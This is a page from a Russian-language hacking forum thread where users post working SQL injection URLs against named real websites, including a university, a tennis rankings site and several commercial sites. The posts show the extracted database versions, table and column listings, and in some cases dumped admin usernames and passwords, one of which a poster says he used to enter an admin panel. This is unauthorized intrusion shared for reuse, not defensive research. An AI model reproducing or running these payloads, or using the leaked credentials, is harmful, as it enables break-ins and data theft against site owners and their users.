ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 507 из 1242 « Первая < 7407457497 503 504 505 506 507 508 509 510 511 5175576071007 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5061  
Старый 10.03.2008, 13:13
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
http://www.usms.org/articles/articledisplay.php?a=-150'+union+select+1,2,3,4,5,6,7,8,9/*
name=usms_main
dbver=5.0.27-standard
user=usms_rw@172.16.1.1
таблы так и не осилил
 
Ответить с цитированием

  #5062  
Старый 10.03.2008, 13:44
ZipaCna
Познающий
Регистрация: 29.02.2008
Сообщений: 66
Провел на форуме:
139469

Репутация: 33
По умолчанию
Мой первый скуль в топике:

http://www.speedguide.net/read_articles.php?id=-174+union+select+1,2,concat(user,password),4,5+fro m+mysql.user--
 
Ответить с цитированием

  #5063  
Старый 10.03.2008, 14:19
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию
ЦЕЛЬ:
Код:
http://www.fnm.msu.ru
УЯЗВИМОСТЬ:
Код:
BLIND SQL INJ
ГДЕ:
Код:
http://www.fnm.msu.ru/main.php?topic=1 and 1=1
ЭКРАНИРОВАНИЕ СПЕЦСИМВОЛОВ:
Код:
ДА
ВЕРСИЯ MySQL:
Код:
5.0.24a-Debian_9-log
НАЛИЧИЕ INFORMATION_SCHEMA:
Код:
ДА
ТАБЛИЦЫ:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
doc_folders
documents
indexim
sessions
subtopics
topics
users
А дальше - сами=)
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #5064  
Старый 10.03.2008, 14:58
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию
Цитата:
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(con cat(version(),0x3a,user(),0x3a,database()),0x71),0 x71),6,7/*
не баян (:
 
Ответить с цитированием

  #5065  
Старый 10.03.2008, 15:58
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

выводит много интересного, но я выбрал pg_user

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

результат:

usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


первый это админ
login: postgres
pass: ********

Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
 
Ответить с цитированием

  #5066  
Старый 10.03.2008, 16:25
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию
www.tungus.ru

Код:
http://www.tungus.ru/views.php?id=791000+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6,7,8+from+users/*
бугага, смотрим в свойтва рисунка
nitros911:ujkfz;jgf голаяжопа
идем в админку
http://www.tungus.ru/admin.php правильно, и админим

куча обоев для рабочего стола скачать 250 мб
 
Ответить с цитированием

  #5067  
Старый 10.03.2008, 16:29
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию
http://www.kalm.ru/ru/docs_view.php?id=-1+union+select+1,2,3,4,concat(version(),char(58),d atabase(),char(58),user()),6,7,8+--

4.0.16-log
kalm_ru
kalm@localhost
 
Ответить с цитированием

  #5068  
Старый 10.03.2008, 17:31
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию
Цитата:
http://www.iwdp.co.uk/profile.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: iwdp
USER: iwdp@localhost

Цитата:
http://www.eipcprograms.com/product.php?id=9999+union+select+1,VERSION(),3,4,5 ,6,7,8,9,10,11,12,13/*
VERSION: 5.0.24a-log
DATABASE: d60350056
USER: u70382875@cgihost
 
Ответить с цитированием

  #5069  
Старый 10.03.2008, 17:41
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 cash$$$
Два баяна
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981
_http://forum.antichat.ru/showpost.php?p=577278&postcount=4680
 
Ответить с цитированием

  #5070  
Старый 10.03.2008, 17:44
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
рейтинг игроков в теннис
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'

перебераем таблы
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('plyrbioHTML','ContestInfo_bak','rankdates','SQLINJECTION','rankmast','RollingRank','sglbest14','PlayerEquip','sglbest14roll','sglmtchfact','PlayerEquip_backup','ClipBTournEntryPossibles','cntrymast','cntrymast_Latino','ContestInfo','dblbest14','dblbest14roll','dblno1plyr','dblrndrsl','dblrndrslXX','dbltrnrsl','dbltrnrslroll','dblwinstreak','dtproperties','DW_EventHistoryByTrnYearTrnNum','DW_SglRaceRankByCountry','emailtemp','ENTY_PlayerProperty'))
все лень было перебирать
Код:
plyrbioHTML',
'ContestInfo_bak',
'rankdates'
,'SQLINJECTION',
'rankmast','RollingRank',
'sglbest14','PlayerEquip',
'sglbest14roll','sglmtchfact',
'PlayerEquip_backup',
'ClipBTournEntryPossibles',
'cntrymast','cntrymast_Latino',
'ContestInfo',
'dblbest14',
'dblbest14roll',
'dblno1plyr','dblrndrsl',
'dblrndrslXX'
,'dbltrnrsl','dbltrnrslroll',
'dblwinstreak',
'dtproperties','DW_EventHistoryByTrnYearTrnNum',
'DW_SglRaceRankByCountry'
,'emailtemp'
,'ENTY_PlayerProperty
берем таблицу перебираем столбцы для примера plyrbioHTML
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='plyrbioHTML'AND+COLUMN_NAME+NOT+IN+('plyrnum','lastupdate','updateind','biotext'))--
находим нужный столец выводим напр plyrnum
Код:
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=1'+or+1=(SELECT+TOP+1+plyrnum+FROM+plyrbioHTML)--
получаем 'A001'
Куму нужно ишите админку просто честно лень было

P.s там же в строке поиска фотографий Иньекция через POST параметр коу как удобней
Последний раз редактировалось MaSter GeN; 10.03.2008 в 17:46..
 
Ответить с цитированием
Ответ
Страница 507 из 1242 « Первая < 7407457497 503 504 505 506 507 508 509 510 511 5175576071007 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ